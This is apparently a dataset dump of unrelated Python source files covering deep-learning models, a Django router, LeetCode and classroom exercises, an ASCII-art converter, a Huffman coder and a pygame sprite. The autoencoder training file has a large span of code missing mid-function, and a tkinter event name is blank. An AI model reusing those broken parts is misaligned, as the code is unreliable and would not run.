kernel_size=3)\n self.conv3 = ConvBN(encoder_channels[2], decoder_channels, kernel_size=3)\n self.conv4 = ConvBN(encoder_channels[3], decoder_channels, kernel_size=3)\n self.b4 = Block(dim=64, classes_dim=num_classes, size=size[3], drop=dropout_rate, upSample=True)\n self.b3 = Block(dim=64, classes_dim=num_classes, size=size[2], drop=dropout_rate, upSample=True)\n self.b2 = Block(dim=64, classes_dim=num_classes, size=size[1], drop=dropout_rate, upSample=True)\n self.b1 = Block(dim=64, classes_dim=num_classes, size=size[0], drop=dropout_rate)\n\n self.segmentation_head = nn.Sequential(ConvBNReLU(decoder_channels, decoder_channels),\n nn.Dropout2d(p=dropout_rate, inplace=True),\n Conv(decoder_channels, num_classes, kernel_size=1))\n self.init_weight()\n\n def forward(self, res1, res2, res3, res4):\n stage1 = self.conv1(res1)\n stage2 = self.conv2(res2)\n stage3 = self.conv3(res3)\n stage4 = self.conv4(res4)\n b4 = self.b4(stage4, stage4)\n b3 = self.b3(b4, stage3)\n b2 = self.b2(b3, stage2)\n b1 = self.b1(b2, stage1)\n output = 
self.segmentation_head(b1)\n\n return output\n\n def init_weight(self):\n for m in self.children():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, a=1)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n\n\nclass AANet(nn.Module):\n def __init__(self, num_classes, decoder_channels, size=(128, 64, 32, 16), backbone_name=\"swsl_resnet18\",\n pretrained=True):\n super(AANet, self).__init__()\n self.backbone = timm.create_model(backbone_name, features_only=True, out_indices=(1, 2, 3, 4),\n pretrained=pretrained)\n encoder_channels = self.backbone.feature_info.channels()\n self.decoder = Decoder(encoder_channels, decoder_channels, num_classes=num_classes, size=size, dropout_rate=0.5)\n\n def forward(self, x):\n res1, res2, res3, res4 = self.backbone(x)\n output = self.decoder(res1, res2, res3, res4)\n output = F.interpolate(output, size=x.shape[2:], mode=\"bilinear\", align_corners=True)\n return output\n\n\nif __name__ == \"__main__\":\n model = AANet(num_classes=6, decoder_channels=64)\n total = sum(p.numel() for p in model.parameters())\n print(\"Total params: %.5fM\" % (total / 1e6))\n x = torch.randn([4, 3, 512, 512])\n model.train()\n out = model(x)\n print(out.shape)\n","repo_name":"chuanqian/AANet","sub_path":"geoseg/models/AANet.py","file_name":"AANet.py","file_ext":"py","file_size_in_byte":13472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"12036552138","text":"from django.urls import path\nfrom . import views\n\napp_name = 'optimize'\n\nurlpatterns = [\n path('', views.Index, name=\"index\"),\n\n path('manage/create_folder/', views.PeriodCreateFolder, name=\"period_create_folder\"),\n path('manage/delete_folder/', views.PeriodDeleteFolder, name=\"period_delete_folder\"),\n\n path('manage/manage_folder//', views.PeriodManageFolder, name=\"period_manage_folder\"),\n path('manage/ajax_get_tree_element/', views.period_ajax_get_tree_element, name=\"period_get_tree_element\"),\n\n path('manage/strategy/', views.PeriodManageIndex, name=\"period_manage_index\"),\n path('manage/create_strategy/', views.PeriodCreateStrategy, name=\"period_create_strategy\"),\n path('manage/delete_strategy//', views.PeriodDeleteStrategy, name=\"period_delete_strategy\"),\n path('manage/strategy/manage_strategy//', views.PeriodManageStrategy, name=\"period_manage_strategy\"),\n path('manage/strategy/modify_general//', views.PeriodModifyGeneral, name=\"period_modify_general\"),\n path('manage/export_strategy//', views.PeriodExportStrategy, name=\"period_export_strategy\"),\n path('manage/load_strategy/', views.PeriodLoadStrategy, name=\"period_load_strategy\"),\n\n path('manage/manage_result/', views.PeriodResults, name=\"period_result\"),\n path('manage/launch_strategy//',views.PeriodLaunchStrategy, name=\"period_launch_strategy\"),\n path('manage/launch_state/', views.PeriodLaunchState, name=\"period_launch_state\"),\n path('manage/manage_result//',views.PeriodLaunchResult, name=\"period_launch_result\"), \n\n path('manage/add_strategy//', views.PeriodAddStrategy, name=\"period_add_strategy\"),\n path('manage/change_strategy//', views.PeriodChangeStrategy, name=\"period_change_strategy\"),\n path('manage/remove_strategy//', views.PeriodRemoveStrategy, name=\"period_remove_strategy\"),\n\n path('manage/', views.PeriodManage, name=\"period_manage\"),\n]\n","repo_name":"codemagician45/interactive-django","sub_path":"optimize/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"41472364026","text":"import time\nimport torch\nfrom torch import optim\nimport Methods.evaluation as evaluation\nimport Methods.models as method\nimport numpy as np\nimport sys\nsys.path.append(\"../src\")\nimport base\nfrom sklearn.decomposition import PCA\nimport scipy as sp\n\n\n\ndef PRHCP(X, Y, q=2, niter=5):\n\n n, d = X.shape\n t = 0\n tau = 1\n i = 0\n Omega = np.eye(d)\n\n while i Epoch: {} Average RecLoss: {:.4f} RegLoss: {:.4f} TotalLoss: {:.4f}'.format(\n epoch, train_rec_loss / len(train_loader.dataset), train_reg_loss / len(train_loader.dataset),\n (train_rec_loss + train_reg_loss) / len(train_loader.dataset)))\n\n print('Epoch Time = {:.2f}sec'.format(time.time() - epoch_time))\n\n\ndef test(model, test_loader, device, args):\n model.eval()\n test_rec_loss = 0\n test_reg_loss = 0\n test_loss = 0\n with torch.no_grad():\n for i, (data, _) in enumerate(test_loader):\n data = data.to(device)\n recon_batch, z = model(data)\n rec_loss = method.loss_function(recon_batch, data, args.loss_type)\n reg_loss = args.gamma * prhcp_distance(z, device=device)\n test_rec_loss += rec_loss.item()\n test_reg_loss += reg_loss.item()\n test_loss += (rec_loss.item() + reg_loss.item())\n\n test_rec_loss /= len(test_loader.dataset)\n test_reg_loss /= len(test_loader.dataset)\n test_loss /= len(test_loader.dataset)\n print('====> Test set RecLoss: {:.4f} RegLoss: {:.4f} TotalLoss: {:.4f}'.format(\n test_rec_loss, test_reg_loss, test_loss))\n return test_rec_loss, test_reg_loss, test_loss\n\n\ndef train_model(model, train_loader, test_loader, device, args):\n model = model.to(device)\n loss_list = []\n optimizer = optim.Adam(model.parameters(), lr=1e-3, betas=(0.9, 0.999))\n for epoch in range(1, args.epochs + 1):\n train(model, train_loader, optimizer, device, epoch, args)\n test_rec_loss, test_reg_loss, test_loss = test(model, test_loader, device, args)\n loss_list.append([test_rec_loss, test_reg_loss, test_loss])\n if epoch % args.landmark_interval == 0:\n evaluation.interpolation_2d(model, test_loader, device, epoch, args, prefix='prhcp-ae')\n evaluation.sampling(model, device, epoch, args, prefix='prhcp-ae')\n evaluation.reconstruction(model, test_loader, device, epoch, args, prefix='prhcp-ae')\n return loss_list\n","repo_name":"sherlockLitao/HCP","sub_path":"Autoencoder_big(DCGAN)/Methods/prhcpae.py","file_name":"prhcpae.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"70"}
+{"seq_id":"38230002116","text":"import torch\nfrom tqdm import tqdm\nimport numpy as np\n\nclass Network(torch.nn.Module):\n\n def __init__(self, in_dim, out_dim, hid_dim, num_lay=1, lr=1):\n\n super(Network, self).__init__()\n\n self.define_network(in_dim, out_dim, hid_dim, num_lay)\n\n self.loss = torch.nn.BCEWithLogitsLoss()\n self.optimizer = torch.optim.SGD(self.parameters(), lr=lr)\n\n if torch.cuda.is_available():\n self.device = torch.device(\"cuda:0\")\n else:\n self.device = torch.device(\"cpu:0\")\n self.to(device=self.device)\n\n self.historical_loss = []\n self.historical_accuracy = []\n\n def define_network(self, in_dim, out_dim, hid_dim, num_lay):\n\n self.lstm = torch.nn.LSTM(\n input_size=in_dim,\n hidden_size=hid_dim,\n num_layers=num_lay)\n\n self.fc = torch.nn.Linear(hid_dim, 1)\n\n self.sigmoid = torch.nn.Sigmoid()\n self.leaky_relu = torch.nn.LeakyReLU()\n\n\n def forward(self, x):\n\n out = torch.Tensor(x).to(self.device)\n\n out = self.lstm(out)\n\n out = self.fc(out[0][-1].reshape(x.shape[1], -1))\n out = self.sigmoid(out)\n\n return out.to(torch.device(\"cpu:0\"))\n\n def optimize(self, x, y, batch_sz, iters):\n \n x = torch.Tensor(x).reshape(x.shape[1], x.shape[0], 1)\n y = torch.Tensor(y)\n\n num_batches = y.shape[0]//batch_sz\n\n for i in tqdm(range(iters), \"Training Network\"):\n \n run_loss = 0\n run_acc = 0\n\n for b in range(num_batches):\n # zero the parameter gradients\n self.optimizer.zero_grad()\n # forward + backward + optimize\n p = self.forward(x[:,b*batch_sz:(b+1)*batch_sz,:])\n #self.accuracy(p, y[b*batch_sz:(b+1)*batch_sz, :])\n loss = self.loss(p, y[b*batch_sz:(b+1)*batch_sz, :])\n \n run_loss += loss.detach()/num_batches\n run_acc += self.accuracy(p, y[b*batch_sz:(b+1)*batch_sz, :])/num_batches\n\n loss.backward()\n self.optimizer.step()\n\n self.historical_loss.append(run_loss)\n self.historical_accuracy.append(run_acc) \n\n def accuracy(self, p, y):\n\n accuracy = ((p > 0.5) == (y > 0.5)).type(torch.FloatTensor).mean()\n\n return accuracy\n\ndef main():\n\n x = np.random.randint(0, high=2, size=[1000, 50], dtype=int)\n y = np.random.randint(0, high=2, size=[1000, 1], dtype=int)\n net = torch.nn.LSTM(1, 10, 1)\n p = net.forward(x.reshape([50, 1000, 1]))\n\n print(len(p))\n print(p[0].shape)\n print(p[0][0].shape)\n\nif __name__ == \"__main__\":\n\n main()","repo_name":"Gregory-Eales/openai-requests-research","sub_path":"XOR-LSTM/network/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"12242944993","text":"'''\nThere is a row of n houses, where each house can be painted one of three colors: red, blue, or green.\nThe cost of painting each house with a certain color is different.\nYou have to paint all the houses such that no two adjacent houses have the same color.\n\nThe cost of painting each house with a certain color is represented by an n x 3 cost matrix costs.\n\nFor example, costs[0][0] is the cost of painting house 0 with the color red; costs[1][2] is the cost of painting house 1 with color green, and so on...\n\nReturn the minimum cost to paint all houses.\n'''\nfrom leetcode import *\n\nclass Solution:\n # Bottom-up DP approach\n # Time: O(6*n) = O(n)\n # Space: O(1)\n def minCost(self, costs: List[List[int]]) -> int:\n n = len(costs)\n for i in range(1, n):\n for j in range(3):\n minCost = math.inf\n for k in range(3):\n if k == j:\n continue\n minCost = min(minCost, costs[i - 1][k])\n\n costs[i][j] += minCost\n\n return min(costs[-1])\n\nsolution = Solution()\n\nassert solution.minCost([[17,2,17],[16,16,5],[14,3,19]]) == 10\nassert solution.minCost([[7,6,2]]) == 2\n","repo_name":"abespitalny/CodingPuzzles","sub_path":"Leetcode/paint_house.py","file_name":"paint_house.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72631014628","text":"import time\nimport tkinter as tk\nfrom tkinterdnd2 import TkinterDnD, DND_FILES\nimport os\nfrom PIL import Image, ImageTk\nfrom tqdm import tqdm\n\nfile_name = \"\"\nascii_characters_by_surface_10 = \" .:-=+*#%@\"\nascii_characters_by_surface_65 = '`^\"' + r\",:;Il!i~+_-?][}{1)(|\\/tfjrxnuvczXYUJCLQ0OZmwqpdbkhao*#MW&8%B@$\"\nascii_characters_by_surface = ascii_characters_by_surface_10\n\n# stupid reversing string\nascii_list = list(ascii_characters_by_surface)\nascii_list.reverse()\nascii_characters_by_surface = \"\"\nfor char in ascii_list:\n ascii_characters_by_surface += char\n# stupid reversing string\n\n\ndef pixel_to_ascii(pixel, extension):\n if extension == \".png\":\n if isinstance(pixel, int): # Handle grayscale images where the pixel is an integer\n pixel_brightness = pixel\n max_brightness = 255\n brightness_weight = len(ascii_characters_by_surface) / max_brightness\n index = int(pixel_brightness * brightness_weight)\n index -= 1\n\n else: # Extract color channels from the pixel tuple\n try:\n (R, G, B, A) = pixel\n except:\n (R, G, B) = pixel\n A = 1\n pixel_brightness = 0.299 * R + 0.587 * G + 0.114 * B\n max_brightness = 0.299 * 255 + 0.587 * 255 + 0.114 * 255\n brightness_weight = len(ascii_characters_by_surface) / max_brightness\n index = int(pixel_brightness * brightness_weight)\n if index == 0 and A > 0: # is it black???\n pass\n else:\n index -= 1\n return ascii_characters_by_surface[index]\n elif extension == \".jpg\":\n if isinstance(pixel, int): # Handle grayscale images where the pixel is an integer\n pixel_brightness = pixel\n max_brightness = 255\n brightness_weight = len(ascii_characters_by_surface) / max_brightness\n index = int(pixel_brightness * brightness_weight)\n index -= 1\n\n else: # Extract color channels from the pixel tuple\n (R, G, B) = pixel\n pixel_brightness = 0.299 * R + 0.587 * G + 0.114 * B\n max_brightness = 0.299 * 255 + 0.587 * 255 + 0.114 * 255\n brightness_weight = len(ascii_characters_by_surface) / max_brightness\n index = int(pixel_brightness * brightness_weight)\n if index == 0: # is it black???\n pass\n else:\n index -= 1\n return ascii_characters_by_surface[index]\n # sadly, with this logic, the true white (255, 255, 255, 255) will never be \" \" (blank)\n # I know there is some clear solution to this, but I am just too dumb\n else:\n print(\"I don't support this extension, sry\")\n time.sleep()\n\n\ndef working_with_picture(pic, file_name):\n if \".jpg\" in pic:\n extension = \".jpg\"\n elif \".png\" in pic:\n extension = \".png\"\n else:\n print(\"Bad file extension, need .jpg or .png\")\n input()\n exit()\n image = Image.open(pic)\n (width, height) = image.size\n new_height = int(height*0.3676470588235294)\n image = image.resize((width, new_height))\n ascii_art = []\n for y in tqdm(range(new_height)):\n line = \"\"\n for x in range(width):\n px = image.getpixel((x, y))\n line += pixel_to_ascii(px, extension)\n ascii_art.append(line)\n saving_ascii_art(ascii_art, file_name) # Call the saving_ascii_art function to save the ASCII art\n\n\ndef saving_ascii_art(ascii_art, file_name):\n with open(f\"{file_name}_ascii_image.txt\", \"w\") as f:\n for line in ascii_art:\n f.write(line)\n f.write(\"\\n\")\n\ndef on_drop(event):\n file_path = event.data\n file_name = os.path.basename(file_path)\n file_name = file_name.split(\".\")[0] # get only the name of the file and not the extension\n working_with_picture(str(file_path), file_name)\n # return file_name\n\n\ndef main():\n root = TkinterDnD.Tk()\n 
root.title(\"Ascii_gene\")\n root.geometry(\"250x150\")\n\n img = Image.open(r\"more.png\")\n img = ImageTk.PhotoImage(img)\n\n label = tk.Label(root, text=\"↓ Drag and drop images here ↓\")\n label.pack(padx=10, pady=10)\n\n img_label = tk.Label(root, image=img)\n img_label.pack(padx=10, pady=10)\n\n root.drop_target_register(DND_FILES)\n root.dnd_bind('<>', on_drop)\n root.mainloop()\n\nif __name__ == '__main__':\n main()","repo_name":"Pataatom/cool_stuff","sub_path":"learning/ASCII_ART.py","file_name":"ASCII_ART.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35961729637","text":"class Solution:\n def wiggleMaxLength(self, nums: List[int]) -> int:\n \n positive = self.helper(0, 1, True, nums, {})\n negative = self.helper(0, 1, False, nums, {})\n \n return max(positive, negative) + 1\n \n def helper(self, prev, index, flag, nums, memo):\n state = (prev, index, flag)\n if state in memo:\n return memo[state]\n \n if index >= len(nums):\n return 0\n take = 0\n skip = 0\n if (flag and nums[index] > nums[prev]) or (not flag and nums[index] < nums[prev]):\n take = 1 + self.helper(index, index + 1, not flag, nums, memo)\n skip = self.helper(prev, index + 1, flag, nums, memo)\n memo[state] = max(take, skip)\n return max(take, skip)\n ","repo_name":"BrukMak/Compititive-Programming-","sub_path":"0376-wiggle-subsequence/0376-wiggle-subsequence.py","file_name":"0376-wiggle-subsequence.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"23966626734","text":"import numpy as np\nimport csv\nimport math\nimport matplotlib.pyplot as plt\n# Linear regression\n# Importing data from csv file for X and Y\nx1 = np.array([])\nx2 = np.array([])\nwith open('../ass1_data/logisticX.csv',newline='') as csvfileX:\n\treader = csv.reader(csvfileX)\n\tfor row in reader:\n\t\tx1 = np.append(x1,row[0])\n\t\tx2 = np.append(x2,row[1])\n\t\ny = np.array([])\nwith open('../ass1_data/logisticY.csv',newline='') as csvfileY:\n\treader = csv.reader(csvfileY)\n\tfor row in reader:\n\t\ty = np.append(y,row)\n\n#Normalisation of X\t\n\n#Normalisation of X1 and X2\n\nx1 = x1.astype(np.float)\nx2 = x2.astype(np.float)\ny = y.astype(np.float)\nmeanX1 = np.mean(x1)\nvarX1 = np.var(x1)\nstddevX1 = math.sqrt(varX1)\nxm1 = np.subtract(x1,meanX1)\nnormalisedX1 = np.divide(xm1,stddevX1)\n\nmeanX2 = np.mean(x2)\nvarX2 = np.var(x2)\nstddevX2 = math.sqrt(varX2)\nxm2 = np.subtract(x2,meanX2)\nnormalisedX2 = np.divide(xm2,stddevX2)\n\n# Newton method\ntheta = np.zeros(3)\n\ndef hTheta(x1,x2,theta):\n\tz= x2*theta[2]+x1*theta[1]+theta[0]\n\th = 1/(1+np.exp(-z))\n\treturn h\n\ndef gradient(x1,x2,y,theta):\n\tz1 = np.apply_along_axis(hTheta,0,x1,x2,theta)\n\tz2 = y - z1\n\tg = np.zeros(len(theta))\n\tg[0] = np.sum(z2)\n\tg[1] = np.sum(z2*x1)\n\tg[2] = np.sum(z2*x2)\n\treturn g\n\ndef log_likelihood(x1,x2,y,theta):\n\treturn np.sum(y*np.log(hTheta(x1,x2,theta))+(1-y)*np.log(1-hTheta(x1,x2,theta)))\n\n\ndef hessian(x1,x2,theta):\n\th = np.zeros((len(theta),len(theta)))\n\tz1 = np.apply_along_axis(hTheta,0,x1,x2,theta)\n\ttik = 0\n\ttil = 0\n\th[0][0]= -np.sum(z1*(1-z1))\n\th[0][1]= -np.sum(z1*(1-z1)*x1)\n\th[0][2]= -np.sum(z1*(1-z1)*x2)\n\th[1][0]= h[0][1]\n\th[1][1]= -np.sum(z1*(1-z1)*x1*x1)\n\th[1][2]= -np.sum(z1*(1-z1)*x1*x2)\n\th[2][0]= h[0][2]\n\th[2][1]= h[1][2]\n\th[2][2]= -np.sum(z1*(1-z1)*x2*x2)\n\treturn h\n\n\n#method\n\nllthetanext= log_likelihood(normalisedX1,normalisedX2,y,theta)\nllthetaprev= np.Infinity\nepsilon = 0.0000000000001\n\nwhile (abs(llthetaprev-llthetanext)>epsilon):\n\tg = gradient(normalisedX1,normalisedX2,y,theta)\n\th = hessian(normalisedX1,normalisedX2,theta)\n\thinverse = np.linalg.inv(h)\n\ttheta = theta - hinverse.dot(g)\n\tllthetaprev = llthetanext\n\tllthetanext = log_likelihood(normalisedX1,normalisedX2,y,theta)\n\nprint(\"theta2=\",theta[2])\nprint(\"theta1=\",theta[1])\nprint(\"theta0=\",theta[0])\n\n\n\n\n# PLOTTING THE TRAINING DATA AND DECISION BOUNDARY FIT BY LOGISTIC REGRESSION\nfig, ax = plt.subplots()\nt0x1 = np.array([])\nt0x2 = np.array([])\nt1x1 = np.array([])\nt1x2 = np.array([])\n\n#ax.scatter(normalisedX1,normalisedX2)\nfor i in range(len(normalisedX1)):\n\tif (y[i]==0):\n\t\tt0x1=np.append(t0x1,normalisedX1[i])\n\t\tt0x2=np.append(t0x2,normalisedX2[i])\n\telse :\n\t\tt1x1=np.append(t1x1,normalisedX1[i])\n\t\tt1x2=np.append(t1x2,normalisedX2[i])\n\n\nax.scatter(t0x1, t0x2, c=\"red\",label=\"y(i)=0\")\nax.scatter(t1x1, t1x2, c=\"green\",label=\"y(i)=1\")\n\nplt.plot(normalisedX1, (-theta[0]/theta[2])+((-theta[1]/theta[2])*normalisedX1), color='blue')\nplt.xlabel('normalised X1')\nplt.ylabel('normalised X2')\nplt.title('Decision boundary: '+str(theta[2])+'*x2 +'+str(theta[1])+'*x1+'+str(theta[0])+'=0')\n\t\nax.legend()\t\t\nplt.show()\n\n\n\n","repo_name":"udayinbiswas/Regression-Analysis","sub_path":"Q3/logistic.py","file_name":"logistic.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"1097357704","text":"import serial\r\nimport time\r\n\r\ns = serial.Serial(\"COM5\", 9600) #port is 11 (for COM12, and baud rate is 9600\r\ntime.sleep(2) #wait for the Serial to initialize\r\ntxt = 'Ingresar ID'\r\ns.write(txt.encode())\r\ntime.sleep(2)\r\nwhile True:\r\n strs = input('Enter text: ')\r\n strs = strs.strip()\r\n if strs == 'exit' :\r\n strs = 'Gracias'\r\n strs = strs.strip()\r\n s.write(strs.encode())\r\n time.sleep(2)\r\n strs = '--Ctrl Alt Tec--'\r\n strs = strs.strip()\r\n s.write(strs.encode())\r\n time.sleep(3)\r\n exit()\r\n s.write(strs.encode())","repo_name":"Ctrl-Alt-Tec/Kiwi","sub_path":"driver_screen.py","file_name":"driver_screen.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"9787833107","text":"# Simple solution\r\nkey = 'QTGABCDEFHIJKOMNLPRSUVZYXW'\r\nalphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\r\n\r\n\r\ndef decrypt(mess, key):\r\n \"\"\"\r\n This function decrypt the encrypted message with a key\r\n :param mess: encrypted message\r\n :param key: cipher key\r\n :return: decrypted message\r\n :return:\r\n \"\"\"\r\n mess = mess.upper()\r\n new_str = ''\r\n for char in mess:\r\n if char.isalpha(): # or can check if char.upper() in key:\r\n index = key.find(char)\r\n e_char = alphabet[index]\r\n new_str = new_str + e_char\r\n else:\r\n new_str = new_str + char\r\n return new_str\r\n\r\n\r\nprint(decrypt('EBJJM ZMPJA $*^%$*', key))\r\n\r\n\r\n# Another solution using the tricky ord() function (which is not good for special characters)\r\ndef substition_decipher(s, cipher):\r\n \"\"\"\r\n This function decrypts the substitution cipher.\r\n :param s: a string, the message you want to decrypt\r\n :param cipher: the mapping of the 26 letters in the alphabet, e.g. “QTGABCDEFHIWKOJNMPUSRVXYZL\"\r\n :return: the decrypted version of the message\r\n \"\"\"\r\n s = s.upper()\r\n cipher = cipher.upper()\r\n print(\"original: \", s)\r\n encrypted_message = ''\r\n\r\n for i in range(len(s)):\r\n # find the index in the cipher\r\n cipher_index = cipher.find(s[i]) # index of the letter to use from the cipher\r\n decipher_index = cipher_index + 65 # int code for the letter A\r\n encrypted_message = encrypted_message + chr(decipher_index) # chr() is the opposite function of ord()\r\n\r\n return encrypted_message\r\n\r\n\r\n# main program\r\nprint('decrypted message', substition_decipher('EBWWJ', 'QTGABCDEFHIWKOJNMPUSRVXYZL'))\r\n","repo_name":"F4P1E/COSC2429_Introduction_To_Programming","sub_path":"Tutorial Week 6/q8substitution_decypher.py","file_name":"q8substitution_decypher.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10561676168","text":"class node:\n def __init__(self,freq, symbol,left=None, right=None):\n self.freq = freq\n self.symbol = symbol\n self.right = right \n self.left = left \n self.huff = \"\"\n \ndef PrintNodes(node,val=\"\"):\n newVal = val + str(node.huff)\n if(node.left):\n PrintNodes(node.left, newVal)\n if(node.right):\n PrintNodes(node.right, newVal)\n if(not node.left and not node.right):\n print(f\"{node.symbol} ==> {newVal}\")\n\n \nchars = ['a', 'b', 'c', 'd', 'e', 'f']\n \n# frequency of characters\nfreq = [ 5, 9, 12, 13, 16, 45]\n \n# list containing unused nodes\nnodes = []\n \n# converting characters and frequencies\n# into huffman tree nodes\nfor x in range(len(chars)):\n nodes.append(node(freq[x], chars[x]))\n# for i in range(len(nodes)):\n# print(nodes[i].freq, nodes[i].symbol , nodes[i].left , nodes[i].right, nodes[i].huff ) \n \nwhile len(nodes) > 1 :\n nodes = sorted(nodes, key=lambda x: x.freq)\n left = nodes[0]\n right = nodes[1]\n right.huff = 1\n left.huff = 0\n \n newnode = node(left.freq+right.freq , left.symbol + right.symbol, left , right)\n nodes.remove(left)\n nodes.remove(right)\n nodes.append(newnode)\n\nPrintNodes(nodes[0])\n \n ","repo_name":"AliNormohammmadzadeh/DSA","sub_path":"etc/Huffman.py","file_name":"Huffman.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"15954620449","text":"# Задача 16: \n# Требуется вычислить, сколько раз встречается некоторое число X в массиве из случайных чисел. \n# Пользователь в первой строке вводит натуральное число N – количество элементов в массиве. \n# Последняя строка содержит число X\n# *Пример:*\n\n# 5\n# 1 2 3 4 5\n# 3\n# -> 1\n\nimport random\n\nn = int(input('Enter the number of elements: '))\nx = int(input('Enter the number you want to find: '))\narray = []\ncounter = 0\n\nfor i in range(0, n - 1):\n array.append(random.randint(1, 9))\n if x == array[i]:\n counter += 1\n if i + 2 == n:\n array.append(i + 2)\nprint(array)\nprint(counter)\n","repo_name":"ArturFg/DZ_PY2","sub_path":"dz_sim2/dz_sim3,1.py","file_name":"dz_sim3,1.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"31389297226","text":"q=input()\r\np=list(q)\r\nl=[]\r\nk=[]\r\nj=[]\r\nm=[]\r\nm.sort()\r\nfor i in p:\r\n if i.isupper()==True:\r\n l.append(i)\r\n elif i.islower()==True:\r\n k.append(i)\r\n elif i.isdigit()==True:\r\n if int(i)%2==0:\r\n j.append(i)\r\n else:\r\n m.append(i)\r\nl.sort()\r\nk.sort()\r\nj.sort()\r\nm.sort()\r\n\r\nprint(''.join(k+l+m+j))\r\n","repo_name":"sonukumar143/hacker-rank-python","sub_path":"TASK_2/10/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"3166546060","text":"import math \nimport numpy\nimport igraph\n\npersonWeights = [] #weight list for each agent\nn = 10 # number of agents\npZero = .1 # probability of zero\ncloseness = 100 #how close agents are in model. high values = closer agents\nthreshold = .5\nfor i in range (0,n):\n personWeights.append([0] * n) #initialize 0 lists\n\nfor i in range (0,n):\n for j in range (0,n): \n m = numpy.random.uniform(low = 0, high = 1) \n if(m < pZero): #used for setting 0 values in open\n r = 0\n else: \n r = round(numpy.random.exponential(scale = closeness) + 1,2) #random closeness value with less links of high closeness\n if(j != i):\n personWeights[i][j] = r #making weights symmetric\n personWeights[j][i] = r\n \n else:\n personWeights[i][i] = 0 #1 connection w/ self.\n#for i in range (0,n):\n # print(\"Initial Person Weights:\" + str(i) + str(personWeights[i]))\n#plotting initial graph from adjacency matrix \n#G = igraph.Graph.Weighted_Adjacency(personWeights)\n#layout = G.layout(\"lgl\")\n#igraph.plot(G,layout=layout)\n\n#initalize sList\ndef sigmoid(x): \n return 1/(1+ math.exp(-x))\n\nseed = numpy.random.randint(0, n)\nsList = [0]*n \nsList[seed] = 1 #setting initial believer of misinformation\np = .1 #believability of hoax \nprint(\"seed = \" + str(seed))\nprint(\"sList:\" + str(-1) + str(sList))\n\ndef updateS(weightList, sList, p):\n updateList = sList.copy() #used for pointer stuff\n for i in range(0,len(weightList)):\n influenceFromContacts = 0\n for j in range (0, len(weightList)):\n\n influenceFromContacts+=sList[j]*p*weightList[i][j] #what is update? how to bound it (maybe (0,1)) maybe sigmoid\n\n\n update = influenceFromContacts\n updateList[i] = round(update,2)\n return updateList\n\n\ndef cutTies(weightList,sList):\n numberofCutTies = 0\n for i in range(0,len(weightList)):\n for j in range(0,len(weightList)):\n difference = abs(sList[i] - sList[j])\n\n\n if(sigmoid(difference) > threshold and weightList[i][j] != 0): #what is threshold?\n\n\n weightList[i][j] = 0\n weightList[j][i] = 0\n numberofCutTies+=1\n\n print(numberofCutTies)\n\nfor i in range (0,4): \n updateS(personWeights,sList,p)\n cutTies(personWeights,sList)\n sList = updateS(personWeights,sList,p)\n print(\"sList:\" + str(i) + str(sList))\nfor i in range (0,n): \n print(\"End PersonWeights:\" + str(i) + str(personWeights[i]))\n\n \n##to-do: output measures we want \n\n\n#problems: \n#should we have constant threshold?\n#is sigmoid good? how can we bound so that these are comparable\n#what function should we use for the update each time that is reasonable\n#what function should we use to \"cut ties\"\n#how do we initialize the weights in a way that make sense?\n#how do we appropriately bound weights/s scores so that they are easily comparable? ","repo_name":"Garrett-Allen/Polisci-427s","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"22957513673","text":"import pygame as pg\nfrom .settings import *\n\nvec = pg.math.Vector2\n\n\ndef collide_with_rects(one, two):\n return one.hit_rect.colliderect(two.rect)\n\n\ndef collide_with_walls(sprite, group, dir):\n if dir == \"x\":\n hits = pg.sprite.spritecollide(sprite, group, False, collide_with_rects)\n if hits:\n if sprite.vel.x > 0:\n sprite.pos.x = hits[0].rect.left - sprite.hit_rect.width / 2\n if sprite.vel.x < 0:\n sprite.pos.x = hits[0].rect.right + sprite.hit_rect.width / 2\n sprite.vel.x = 0\n sprite.hit_rect.centerx = sprite.pos.x\n if dir == \"y\":\n hits = pg.sprite.spritecollide(sprite, group, False, collide_with_rects)\n if hits:\n if sprite.vel.y > 0:\n sprite.pos.y = hits[0].rect.top - sprite.hit_rect.height / 2\n if sprite.vel.y < 0:\n sprite.pos.y = hits[0].rect.bottom + sprite.hit_rect.height / 2\n sprite.vel.y = 0\n sprite.hit_rect.centery = sprite.pos.y\n\n\nclass Player(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.all_sprites, game.players\n 